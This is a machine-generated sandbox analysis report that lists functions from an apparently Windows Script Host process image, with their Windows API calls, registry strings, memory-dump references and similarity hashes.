WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7C0B97187), ref: 00007FF7C0BA180D
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7C0B97187), ref: 00007FF7C0BA181A
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7C0B97187), ref: 00007FF7C0BA187B
RegQueryValueExA.ADVAPI32 ref: 00007FF7C0BA18A4

Memory Dump Source

Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true

Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd

Similarity

API ID: ByteCharMultiQueryValueWide$ErrorLast
String ID:
API String ID: 2750480488-0
Opcode ID: a2a956957d85d1160a1c1e75a8ff9ebabad4ec5ff4d62bef0ec57683f727d191
Instruction ID: c7815e989a76bd4c0db17e633ded3f16e4ea4f25ea4d17c1ccf052c99d0fcab5
Opcode Fuzzy Hash: a2a956957d85d1160a1c1e75a8ff9ebabad4ec5ff4d62bef0ec57683f727d191
Instruction Fuzzy Hash: 7B41A632618A8185E761DF2198403BAA3E0FB45BB8F944735EA5F86BD8CF3CE5648750

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7C0BA134C, Relevance: 7.6, APIs: 5, Instructions: 90registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(?,?,?,?,?,?,00000000,?,00000000,00007FF7C0B96FD2), ref: 00007FF7C0BA1398
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,00000000,?,00000000,00007FF7C0B96FD2), ref: 00007FF7C0BA13EC
GetLastError.KERNEL32(?,?,?,?,?,?,00000000,?,00000000,00007FF7C0B96FD2), ref: 00007FF7C0BA13F9
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,00000000,?,00000000,00007FF7C0B96FD2), ref: 00007FF7C0BA144B
RegOpenKeyExA.ADVAPI32(?,?,?,?,?,?,00000000,?,00000000,00007FF7C0B96FD2), ref: 00007FF7C0BA146E

Memory Dump Source

Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true

Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd

Similarity

API ID: ByteCharMultiOpenWide$ErrorLast
String ID:
API String ID: 2849162748-0
Opcode ID: f9f8151cbd7af3419927ac46581999f41de44eceef652958aeb7a6e100837b59
Instruction ID: 009b773d1b461fa1677d13966ec393c381c1e896e4dbde55aa505f722793e6fe
Opcode Fuzzy Hash: f9f8151cbd7af3419927ac46581999f41de44eceef652958aeb7a6e100837b59
Instruction Fuzzy Hash: AA31F532618B8185E761DF25AC0017AA2E5FB44BB4B844635EE9F87FD4CF3CE4618750

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7C0B96FA8, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 62registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7C0BA134C: RegOpenKeyExW.KERNELBASE(?,?,?,?,?,?,00000000,?,00000000,00007FF7C0B96FD2), ref: 00007FF7C0BA1398

Part of subcall function 00007FF7C0BA134C: WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,00000000,?,00000000,00007FF7C0B96FD2), ref: 00007FF7C0BA13EC
Part of subcall function 00007FF7C0BA134C: GetLastError.KERNEL32(?,?,?,?,?,?,00000000,?,00000000,00007FF7C0B96FD2), ref: 00007FF7C0BA13F9
Part of subcall function 00007FF7C0BA134C: WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,00000000,?,00000000,00007FF7C0B96FD2), ref: 00007FF7C0BA144B
Part of subcall function 00007FF7C0BA134C: RegOpenKeyExA.ADVAPI32(?,?,?,?,?,?,00000000,?,00000000,00007FF7C0B96FD2), ref: 00007FF7C0BA146E

RegCloseKey.ADVAPI32 ref: 00007FF7C0B97077
RegCloseKey.ADVAPI32 ref: 00007FF7C0B97087

Strings

Software\Microsoft\Windows Script Host\Settings, xrefs: 00007FF7C0B96FBA, 00007FF7C0B96FDE
Enabled, xrefs: 00007FF7C0B96FEF

Memory Dump Source

Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true

Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd

Similarity

API ID: ByteCharCloseMultiOpenWide$ErrorLast
String ID: Enabled$Software\Microsoft\Windows Script Host\Settings
API String ID: 2932660033-4294085457
Opcode ID: da21a53021c49f3cd04686625ff5893b40543602bd74628a2b62cd772fdd219a
Instruction ID: 4f22d3cf7ff8b61b3c75796358bb3af9548d37d2a3e0b25e11f93dd6278b2c4b
Opcode Fuzzy Hash: da21a53021c49f3cd04686625ff5893b40543602bd74628a2b62cd772fdd219a
Instruction Fuzzy Hash: CD217532A18A4682EB11EF65EC501B9B361FB84760FC44235E94F86B99CF3CF554C7A4

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7C0B94D54, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7C0BA134C: RegOpenKeyExW.KERNELBASE(?,?,?,?,?,?,00000000,?,00000000,00007FF7C0B96FD2), ref: 00007FF7C0BA1398

RegCloseKey.KERNELBASE ref: 00007FF7C0B94DB5
wcscat_s.MSVCRT ref: 00007FF7C0B94DD4
RegCloseKey.KERNELBASE ref: 00007FF7C0B94E0E

Strings

\ScriptEngine, xrefs: 00007FF7C0B94DC3

Memory Dump Source

Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true

Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd

Similarity

API ID: Close$Openwcscat_s
String ID: \ScriptEngine
API String ID: 2126947803-4133095719
Opcode ID: 82bc82aaad09d417c185d7ad907f769e208dd6aa3d5ce9dbcaae8ec079bab233
Instruction ID: 60fb872ab4481b6eae36efa4a591c270773b52a30e9570e54d349c95037b3085
Opcode Fuzzy Hash: 82bc82aaad09d417c185d7ad907f769e208dd6aa3d5ce9dbcaae8ec079bab233
Instruction Fuzzy Hash: 0F216B25718A4541E721EF61EC4069AE394FF88B94FC04131EA9ED3B89CF3CE515CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7C0BA1608, Relevance: 6.1, APIs: 4, Instructions: 106registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNELBASE(?,?,?,?,?,?,?,00007FF7C0B94DAE), ref: 00007FF7C0BA1682
RegQueryValueExA.ADVAPI32(?,?,?,?,?,?,?,00007FF7C0B94DAE), ref: 00007FF7C0BA1722
MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,00007FF7C0B94DAE), ref: 00007FF7C0BA1761
GetLastError.KERNEL32(?,?,?,?,?,?,?,00007FF7C0B94DAE), ref: 00007FF7C0BA176F

Memory Dump Source

Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true

Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd

Similarity

API ID: QueryValue$ByteCharErrorLastMultiWide
String ID:
API String ID: 1671509117-0
Opcode ID: e8897c70192881227f46fa5e7c2528a0ac7a2b298b88f67da5d42a4b85716764
Instruction ID: 3876c570569d97b3b419beec050c784d71340677e5127061e1814aced704144f
Opcode Fuzzy Hash: e8897c70192881227f46fa5e7c2528a0ac7a2b298b88f67da5d42a4b85716764
Instruction Fuzzy Hash: AB41C532708A819AD751EF399C400A9B3E0FB44B74B888635EA5EC7BD8DF38F5608350

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7C0BA09CC, Relevance: 6.0, APIs: 4, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

LoadStringW.USER32 ref: 00007FF7C0BA0A16
LoadStringA.USER32 ref: 00007FF7C0BA0A23
MultiByteToWideChar.KERNEL32 ref: 00007FF7C0BA0A4F
SysAllocString.OLEAUT32 ref: 00007FF7C0BA0A63

Memory Dump Source

Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true

Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd

Similarity

API ID: String$Load$AllocByteCharMultiWide
String ID:
API String ID: 1944948655-0
Opcode ID: 9f1292a869813a12bafec8d47ba8f4a787ada246003ceb6b1154eafd291793ac
Instruction ID: 2e962f398dc4d716523e18e1ae297dee51c0c0cc7f04be0fac0fbcc3d0d252ab
Opcode Fuzzy Hash: 9f1292a869813a12bafec8d47ba8f4a787ada246003ceb6b1154eafd291793ac
Instruction Fuzzy Hash: A2115731A19B8281E761EF55EC512E6A2A0FF84B60FC44131D58EC2794DF3CF524CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7C0BA0C2C, Relevance: 6.0, APIs: 4, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,?,?,00007FF7C0B99C1D,?,?,?,?,?,?,?,00000000,?,00007FF7C0B94EDA), ref: 00007FF7C0BA0C4F
HeapFree.KERNEL32(?,?,?,00007FF7C0B99C1D,?,?,?,?,?,?,?,00000000,?,00007FF7C0B94EDA), ref: 00007FF7C0BA0C5D
GetProcessHeap.KERNEL32(?,?,?,00007FF7C0B99C1D,?,?,?,?,?,?,?,00000000,?,00007FF7C0B94EDA), ref: 00007FF7C0BA0C84
RtlAllocateHeap.NTDLL ref: 00007FF7C0BA0C92

Memory Dump Source

Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true

Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd

Similarity

API ID: Heap$Process$AllocateFree
String ID:
API String ID: 576844849-0
Opcode ID: 4f15d301f4691c65e617d7d94012a40ddb74ca9710d8a46f2515d79e9bc90b7a
Instruction ID: 0329c91b2d88f18f9d966abd339ca90ed6e36ea3883b420082e719593d901fe7
Opcode Fuzzy Hash: 4f15d301f4691c65e617d7d94012a40ddb74ca9710d8a46f2515d79e9bc90b7a
Instruction Fuzzy Hash: DB01A931F19B4282D715EF66A844029B691FB88BB0F548134DA5E83B54EF3CF8614794

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7C0B92A40, Relevance: 6.0, APIs: 4, Instructions: 34COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7C0BA3BF0: GetSystemTimeAsFileTime.KERNEL32(?,?,?,00007FF7C0B92A4E), ref: 00007FF7C0BA3C21
Part of subcall function 00007FF7C0BA3BF0: GetCurrentProcessId.KERNEL32(?,?,?,00007FF7C0B92A4E), ref: 00007FF7C0BA3C2F
Part of subcall function 00007FF7C0BA3BF0: GetCurrentThreadId.KERNEL32 ref: 00007FF7C0BA3C3B
Part of subcall function 00007FF7C0BA3BF0: GetTickCount.KERNEL32 ref: 00007FF7C0BA3C47
Part of subcall function 00007FF7C0BA3BF0: GetTickCount.KERNEL32 ref: 00007FF7C0BA3C57
Part of subcall function 00007FF7C0BA3BF0: QueryPerformanceCounter.KERNEL32(?,?,?,00007FF7C0B92A4E), ref: 00007FF7C0BA3C72

GetStartupInfoA.KERNEL32 ref: 00007FF7C0B92A7E
GetModuleHandleA.KERNEL32 ref: 00007FF7C0B92A86
GetModuleHandleA.KERNEL32 ref: 00007FF7C0B92A91

Part of subcall function 00007FF7C0BA0E04: RtlInitializeCriticalSection.NTDLL ref: 00007FF7C0BA0E37
Part of subcall function 00007FF7C0BA0E04: GetVersionExA.KERNEL32 ref: 00007FF7C0BA0E4B

ExitProcess.KERNEL32 ref: 00007FF7C0B92ADA

Memory Dump Source

Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true

Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd

Similarity

API ID: CountCurrentHandleModuleProcessTickTime$CounterCriticalExitFileInfoInitializePerformanceQuerySectionStartupSystemThreadVersion
String ID:
API String ID: 3175086957-0
Opcode ID: e278e6fa2d7e27ded7967a1b59aa1e91490d423e65c45ba7cc01002927569202
Instruction ID: a3e402bbcabac63ffbe4259ff5f946740c530f2e20e6e0423e527050c3f1e685
Opcode Fuzzy Hash: e278e6fa2d7e27ded7967a1b59aa1e91490d423e65c45ba7cc01002927569202
Instruction Fuzzy Hash: 7011CE61E1894391EA15FF20EC552B8E361AF54370FC41032D50FC66A2EFBCF56A83A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7C0B9D258, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7C0BA14A0: RegCreateKeyExW.KERNELBASE(?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF7C0B9D27D), ref: 00007FF7C0BA1502

Part of subcall function 00007FF7C0BA1780: RegQueryValueExW.KERNELBASE ref: 00007FF7C0BA17D7

RegCloseKey.ADVAPI32 ref: 00007FF7C0B9D2F4

Strings

DisplayLogo, xrefs: 00007FF7C0B9D2CA
Timeout, xrefs: 00007FF7C0B9D28D

Memory Dump Source

Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true

Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd

Similarity

API ID: CloseCreateQueryValue
String ID: DisplayLogo$Timeout
API String ID: 4083198587-1251482861
Opcode ID: d901754219169ad41d1568d13db4bc5d7c99074eb0fa5d3685015a072fcd08e2
Instruction ID: 7ba4592ae9b06175169df92822db6200f4d1bb774f082f8ad87376ae4dcee83b
Opcode Fuzzy Hash: d901754219169ad41d1568d13db4bc5d7c99074eb0fa5d3685015a072fcd08e2
Instruction Fuzzy Hash: 5111872260868381EF01EF66E840269FB61EB95BA8F948035DA4FC7755DF2DE441C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7C0B94F18, Relevance: 4.6, APIs: 3, Instructions: 53fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7C0BA21C4: CreateFileW.KERNELBASE ref: 00007FF7C0BA221D
Part of subcall function 00007FF7C0BA21C4: GetFileSize.KERNEL32 ref: 00007FF7C0BA230E
Part of subcall function 00007FF7C0BA21C4: GetLastError.KERNEL32 ref: 00007FF7C0BA231C

UnmapViewOfFile.KERNEL32 ref: 00007FF7C0B94F9F
FindCloseChangeNotification.KERNELBASE ref: 00007FF7C0B94FAF
CloseHandle.KERNEL32 ref: 00007FF7C0B94FBE

Memory Dump Source

Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true

Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd

Similarity

API ID: File$Close$ChangeCreateErrorFindHandleLastNotificationSizeUnmapView
String ID:
API String ID: 2332896564-0
Opcode ID: 85e3b3f204752fd8c8503c89a3554d69240964dea804c02e62e4900dddc3e08b
Instruction ID: 5aa20ffe8fa8020daead266aafa5163288c7925663cb3420ea16bd1c2a44991a
Opcode Fuzzy Hash: 85e3b3f204752fd8c8503c89a3554d69240964dea804c02e62e4900dddc3e08b
Instruction Fuzzy Hash: 1B213A36604B4282E600EF16E844769E364FB85BB0F584231EB6E877D0DF78E855C790

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7C0B949B8, Relevance: 3.1, APIs: 2, Instructions: 120memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 00007FF7C0B94A1D
SysStringLen.OLEAUT32 ref: 00007FF7C0B94A39

Memory Dump Source

Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true

Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd

Similarity

API ID: String$Alloc
String ID:
API String ID: 143312630-0
Opcode ID: 6870eee8899fa617de8d89e375d47ea0904e1637a4c1b894673988ae1f61748e
Instruction ID: 1e0edb65a3af2330e2fae0ea48aa1ccce9f9e21a01324b059b0b0894d0d1e73a
Opcode Fuzzy Hash: 6870eee8899fa617de8d89e375d47ea0904e1637a4c1b894673988ae1f61748e
Instruction Fuzzy Hash: 56513936608B8286EB54EF26D840669B7B1FB88FA4F554035CE0E97764DF39F46183A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7C0B940E4, Relevance: 1.5, APIs: 1, Instructions: 42COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7C0B92AE4: GetCurrentThreadId.KERNEL32 ref: 00007FF7C0B92B7C

RtlDeleteCriticalSection.NTDLL ref: 00007FF7C0B9417E

Part of subcall function 00007FF7C0B96FA8: RegCloseKey.ADVAPI32 ref: 00007FF7C0B97077
Part of subcall function 00007FF7C0B96FA8: RegCloseKey.ADVAPI32 ref: 00007FF7C0B97087

Part of subcall function 00007FF7C0B95BFC: GetACP.KERNEL32 ref: 00007FF7C0B95C58
Part of subcall function 00007FF7C0B95BFC: LoadLibraryExW.KERNEL32 ref: 00007FF7C0B95CDA
Part of subcall function 00007FF7C0B95BFC: GetProcAddress.KERNEL32 ref: 00007FF7C0B95CF2
Part of subcall function 00007FF7C0B95BFC: FreeLibrary.KERNEL32 ref: 00007FF7C0B95D00

Memory Dump Source

Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true

Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd

Similarity

API ID: CloseLibrary$AddressCriticalCurrentDeleteFreeLoadProcSectionThread
String ID:
API String ID: 3120584673-0
Opcode ID: 663cd7ab937ee375a1d675d57f1839723efb2fcf9d5bb5f33291d67a00986419
Instruction ID: 6079ef8c5de0f6633107e5306ff10b066610414e89bffa64c956f96bc2ed9c2e
Opcode Fuzzy Hash: 663cd7ab937ee375a1d675d57f1839723efb2fcf9d5bb5f33291d67a00986419
Instruction Fuzzy Hash: D5116321A2C6C252F761EF21EC547E9E664EB98354FC00035E64E82795DF7CF6448790

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00007FF7C0B934D8, Relevance: 60.0, APIs: 28, Strings: 6, Instructions: 460registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32 ref: 00007FF7C0B93572
GetLastError.KERNEL32 ref: 00007FF7C0B93580
RegCloseKey.ADVAPI32 ref: 00007FF7C0B9361D
RegCloseKey.ADVAPI32 ref: 00007FF7C0B9362D
RegCloseKey.ADVAPI32 ref: 00007FF7C0B9363D
RegCloseKey.ADVAPI32 ref: 00007FF7C0B9364C
SysFreeString.OLEAUT32 ref: 00007FF7C0B93657
MultiByteToWideChar.KERNEL32 ref: 00007FF7C0B936CE
LoadTypeLib.OLEAUT32 ref: 00007FF7C0B93722
RegOpenKeyA.ADVAPI32 ref: 00007FF7C0B93764
sprintf_s.MSVCRT ref: 00007FF7C0B937E7
SysFreeString.OLEAUT32 ref: 00007FF7C0B938B0
sprintf_s.MSVCRT ref: 00007FF7C0B93919
WideCharToMultiByte.KERNEL32 ref: 00007FF7C0B9396C
WideCharToMultiByte.KERNEL32 ref: 00007FF7C0B939A7
RegCloseKey.ADVAPI32 ref: 00007FF7C0B939BF
RegCreateKeyA.ADVAPI32 ref: 00007FF7C0B939D7
RegCloseKey.ADVAPI32 ref: 00007FF7C0B939F9
RegCreateKeyA.ADVAPI32 ref: 00007FF7C0B93A15
RegSetValueA.ADVAPI32 ref: 00007FF7C0B93A50
RegSetValueA.ADVAPI32 ref: 00007FF7C0B93A92
RegSetValueA.ADVAPI32 ref: 00007FF7C0B93AD4
RegSetValueA.ADVAPI32 ref: 00007FF7C0B93B13
RegSetValueA.ADVAPI32 ref: 00007FF7C0B93B50
RegCloseKey.ADVAPI32 ref: 00007FF7C0B93B72
RegCreateKeyA.ADVAPI32 ref: 00007FF7C0B93B8C
RegSetValueA.ADVAPI32 ref: 00007FF7C0B93BCE
GetLastError.KERNEL32 ref: 00007FF7C0B93BF7

Strings

CLSID, xrefs: 00007FF7C0B9375D, 00007FF7C0B93BC7
ProgID, xrefs: 00007FF7C0B93B3C
Version, xrefs: 00007FF7C0B93ACD
TypeLib, xrefs: 00007FF7C0B93A8B
LocalServer32, xrefs: 00007FF7C0B93A0E
%d.%d, xrefs: 00007FF7C0B937CB

Memory Dump Source

Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true

Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd

Similarity

API ID: Close$Value$ByteCharCreateMultiWide$ErrorFreeLastStringsprintf_s$FileLoadModuleNameOpenType
String ID: %d.%d$CLSID$LocalServer32$ProgID$TypeLib$Version
API String ID: 74125746-3122451186
Opcode ID: 8a81929ead2d3d370512f69584ac3dbfae35e2ef2b3b523af54e6a4d1e14e249
Instruction ID: 1e1cb4ecc05e85e9f4502e0b05fdb6dca6157d33a2309dca5244acb8654f74f3
Opcode Fuzzy Hash: 8a81929ead2d3d370512f69584ac3dbfae35e2ef2b3b523af54e6a4d1e14e249
Instruction Fuzzy Hash: 46227F36A08B4686EB11EF65D89456AA7B0FF88FA4F840131DE4E83B64DF3CE455C760

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7C0B97B1C, Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 221COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(00000000,?,00000000,00000000,00000000,?,?,00007FF7C0B9820A), ref: 00007FF7C0B97B8C
GetLastError.KERNEL32 ref: 00007FF7C0B97B98
GetTempPathA.KERNEL32(00000000,?,00000000,00000000,00000000,?,?,00007FF7C0B9820A), ref: 00007FF7C0B97BB5
GetTempPathA.KERNEL32 ref: 00007FF7C0B97BE3
GetLastError.KERNEL32 ref: 00007FF7C0B97BED
CloseHandle.KERNEL32 ref: 00007FF7C0B97E22

Strings

wsh, xrefs: 00007FF7C0B97C2A

Memory Dump Source

Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true

Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd

Similarity

API ID: ErrorLastPathTemp$ByteCharCloseHandleMultiWide
String ID: wsh
API String ID: 4111154415-3917767832
Opcode ID: 43af52893c9256608d63898f5483cb01fc1c7ebab9671ab4412f3dd768710232
Instruction ID: ee9b4e6781d47de53901d87de5e5c9b4ef7e75ffa30ca1c7b3c71ef8b3bac4e7
Opcode Fuzzy Hash: 43af52893c9256608d63898f5483cb01fc1c7ebab9671ab4412f3dd768710232
Instruction Fuzzy Hash: 13819021B4878246E765EF22AC4023AA6E4FF48BA4F845135DD4FA7B94DF3CF55182A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7C0BA340C, Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 330libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7C0BA2F10: GetVersionExW.KERNEL32 ref: 00007FF7C0BA2F56
Part of subcall function 00007FF7C0BA2F10: GetVersionExW.KERNEL32 ref: 00007FF7C0BA2F6D

LoadLibraryExW.KERNEL32 ref: 00007FF7C0BA3465
SearchPathW.KERNEL32 ref: 00007FF7C0BA34A8
FindResourceExW.KERNEL32 ref: 00007FF7C0BA34ED
GetUserDefaultUILanguage.KERNEL32 ref: 00007FF7C0BA3514
GetLocaleInfoW.KERNEL32 ref: 00007FF7C0BA3546
_wcsncoll.MSVCRT ref: 00007FF7C0BA3564
GetSystemDefaultUILanguage.KERNEL32 ref: 00007FF7C0BA362A
FreeLibrary.KERNEL32 ref: 00007FF7C0BA36E2
FreeLibrary.KERNEL32 ref: 00007FF7C0BA3768
LoadLibraryExW.KERNEL32 ref: 00007FF7C0BA38E1
FreeLibrary.KERNEL32 ref: 00007FF7C0BA38F2

Strings

MUI, xrefs: 00007FF7C0BA34DF
%s\%s, xrefs: 00007FF7C0BA3780

Memory Dump Source

Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true

